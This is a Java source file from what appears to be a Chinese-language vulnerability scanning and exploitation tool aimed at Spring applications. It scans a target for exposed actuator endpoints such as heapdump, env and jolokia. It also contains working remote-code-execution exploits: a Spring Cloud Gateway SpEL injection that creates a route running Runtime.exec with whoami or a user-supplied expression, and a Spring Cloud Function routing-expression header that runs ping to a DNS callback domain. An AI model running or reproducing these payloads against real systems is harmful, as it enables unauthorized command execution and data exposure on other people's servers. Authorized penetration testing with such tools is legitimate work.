package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.*;
import sun.security.krb5.internal.crypto.Des;

import javax.naming.Context;
import java.net.MalformedURLException;
import java.util.HashMap;

@BasicMapping(uri = "Spring")
public class SpringController extends Controller implements BasicController{
    public SpringController(){}

@VulnerabilityDescriptionMapping(Description = "Spring 弱点路径扫描",SupportVulType = SupportVul.信息泄露)
    public void vul_Infomation泄露(Poc_Exp type, String target,Object... args) throws MalformedURLException{
    WriteLog("\n[*]开始检测：  vul_Infomation泄露 。。。。扫描路径中");

    String Check = "/actuator\n" +
            "/auditevents\n" +
            "/autoconfig\n" +
            "/beans\n" +
            "/caches\n" +
            "/conditions\n" +
            "/configprops\n" +
            "/docs\n" +
            "/dump\n" +
            "/env\n" +
            "/flyway\n" +
            "/health\n" +
            "/heapdump\n" +
            "/httptrace\n" +
            "/info\n" +
            "/intergrationgraph\n" +
            "/jolokia\n" +
            "/logfile\n" +
            "/loggers\n" +
            "/liquibase\n" +
            "/metrics\n" +
            "/mappings\n" +
            "/prometheus\n" +
            "/refresh\n" +
            "/scheduledtasks\n" +
            "/sessions\n" +
            "/shutdown\n" +
            "/trace\n" +
            "/threaddump\n" +
            "/actuator/auditevents\n" +
            "/actuator/beans\n" +
            "/actuator/health\n" +
            "/actuator/conditions\n" +
            "/actuator/configprops\n" +
            "/actuator/env\n" +
            "/actuator/info\n" +
            "/actuator/loggers\n" +
            "/actuator/heapdump\n" +
            "/actuator/threaddump\n" +
            "/actuator/metrics\n" +
            "/actuator/scheduledtasks\n" +
            "/actuator/httptrace\n" +
            "/actuator/mappings\n" +
            "/actuator/jolokia\n" +
            "/actuator/hystrix.stream";
            String[] CheckList = Check.split("\n");

    switch (type) {
        case EXP:
            WriteLog("\n vul_信息泄露漏洞 没有Exp");
            break;
        case POC:
            try {
                intruder(target,CheckList);
                WriteLog("\n目录扫描结束 -----");
            }catch (InterruptedException e){
                WriteLog("\n[*]   线程出现异常");
                System.out.println(e.getMessage());
            }
    }
}
public void intruder(String target, String[] urls) throws InterruptedException {
    Intruder intruder = new Intruder();
    for (String url : urls){
        String Target = target + url;
        intruder = new Intruder();
        intruder.setArgs("");
        intruder.setMethod("GET");
        intruder.setTarget(Target);
        intruder.start();
    }
    intruder.join();
}

@VulnerabilityDescriptionMapping(Description = "SpringGatwaySpel 注入",SupportVulType = SupportVul.SPEL)
    public void vul_SpringGatewaySPEL(Poc_Exp type, String target,Object... args) throws MalformedURLException, InterruptedException {
    WriteLog("\n[*]开始检测：  vul_SpringGatewaySPEL");

    String url = "/actuator/gateway/routes/hacktest1";
    switch (type) {
        case EXP:
            WriteExpLog("\n[*]开始检测：  vul_SpringGatewaySPEL");
            String SPEL = "";

            if (args!=null){
                SPEL = (String) args[0];
            }
            if (SPEL.equals("")){
                WriteExpLog("\n[*]Error  请输入SPLE 表达式");
            }
            String data_exp = "{\r" +
                    "      \"id\": \"hacktest1\",\r" +
                    "      \"filters\": [{\r" +
                    "        \"name\": \"AddResponseHeader\",\r" +
                    "        \"args\": {\"name\": \"Result\",\"value\": \""+SPEL+"\"}\r" +
                    "        }],\r" +
                    "      \"uri\": \"http://example.com\",\r" +
                    "      \"order\": 0\r" +
                    "    }";

            HttpRequest httpRequest_exp = new HttpRequest(target + "/actuator/gateway/routes/hacktest1");
            httpRequest_exp.addHeaders("Content-Type","application/json");
            Response response_exp = httpRequest_exp.Post(data_exp);
            if (response_exp.statusCode!=201){
                return;
            }
            WriteExpLog("\n[*]存在 vul_SpringGatewaySPEL 漏洞\n");
            HttpRequest httpRequest2_exp = new HttpRequest(target + "/actuator/gateway/refresh");
            Response response2_exp = httpRequest2_exp.Post("");
            if (response2_exp.statusCode!=200){
                WriteExpLog("\n[*] Vul_SpringGatewaySPEL 刷新网关时出错\n");
                return;
            }
            Thread.sleep(2000);
            HttpRequest req_exp = new HttpRequest(target + "/actuator/gateway/routes/hacktest1");
            Response result_exp = req_exp.Get("");
            if (result_exp.responseBody.contains("AddResponseHeader")){
                WriteExpLog("\n"+result_exp.responseBody);
            }

            HttpRequest httpRequest3_exp = new HttpRequest(target + "/actuator/gateway/routes/hacktest1");
            httpRequest3_exp.Connect("DELETE","",httpRequest3_exp.IsHttps);
            new HttpRequest(target + "/actuator/gateway/refresh").Post("");
            break;
        case POC:

                String data = "{\r" +
                        "      \"id\": \"hacktest1\",\r" +
                        "      \"filters\": [{\r" +
                        "        \"name\": \"AddResponseHeader\",\r" +
                        "        \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"whoami\\\"}).getInputStream()))}\"}\r" +
                        "        }],\r" +
                        "      \"uri\": \"http://example.com\",\r" +
                        "      \"order\": 0\r" +
                        "    }";

                HttpRequest httpRequest = new HttpRequest(target + "/actuator/gateway/routes/hacktest1");
                httpRequest.addHeaders("Content-Type","application/json");
                Response response = httpRequest.Post(data);
                if (response.statusCode!=201){
                    return;
                }
                WriteLog("\n[*]存在 vul_SpringGatewaySPEL 漏洞(仅说明状态码为201)\n");
            HttpRequest httpRequest2 = new HttpRequest(target + "/actuator/gateway/refresh");
                Response response2 = httpRequest2.Post("");
                if (response2.statusCode!=200){
                    WriteLog("\n[*] Vul_SpringGatewaySPEL 刷新网关时出错\n");
                    return;
                }
                Thread.sleep(2000);
                HttpRequest req = new HttpRequest(target + "/actuator/gateway/routes/hacktest1");
                Response result = req.Get("");
                if (result.responseBody.contains("AddResponseHeader")){
                    WriteLog("\n[*]"+result.responseBody);
                }

                HttpRequest httpRequest3 = new HttpRequest(target + "/actuator/gateway/routes/hacktest1");
                httpRequest3.Connect("DELETE","",httpRequest3.IsHttps);
                new HttpRequest(target + "/actuator/gateway/refresh").Post("");
    }
}
    @VulnerabilityDescriptionMapping(Description = "SpringCloudFunction Spel 注入",SupportVulType = SupportVul.SPEL)
    public void vul_SpringCloudFunction(Poc_Exp type, String target,Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  SpringCloudFunction Spel 注入");

        String url = "/functionRouter";
        switch (type) {
            case EXP:
                WriteLog("\n[*] vul_SpringCloudFunction 没有Exp");
                break;
            case POC:
                try{
                    if (Cache.uiController.DNSDomain.getText().equals("")){
                        WriteLog("\n[*]DNS验证类型漏洞 请配置 DNSLOG 地址");
                        return;
                    }else {
                        DNSLOG.setDomain(Cache.uiController.DNSDomain.getText());
                    }
                    String domain = DNSLOG.getRandomDomain();
                    HttpRequest httpRequest = new HttpRequest(target + url);
                    httpRequest.addHeaders("spring.cloud.function.routing-expression","T(java.lang.Runtime).getRuntime().exec(\"ping -nc 1 "+domain+"\")");
                    httpRequest.Post("xxx");

                    WriteLog("\n[*] 请自行判断是否成功" + DNSLOG.domain);

                }catch (Exception e){
                    WriteLog("\n[*] 请自行判断是否成功。"+ DNSLOG.domain);
                }

        }
    }
}
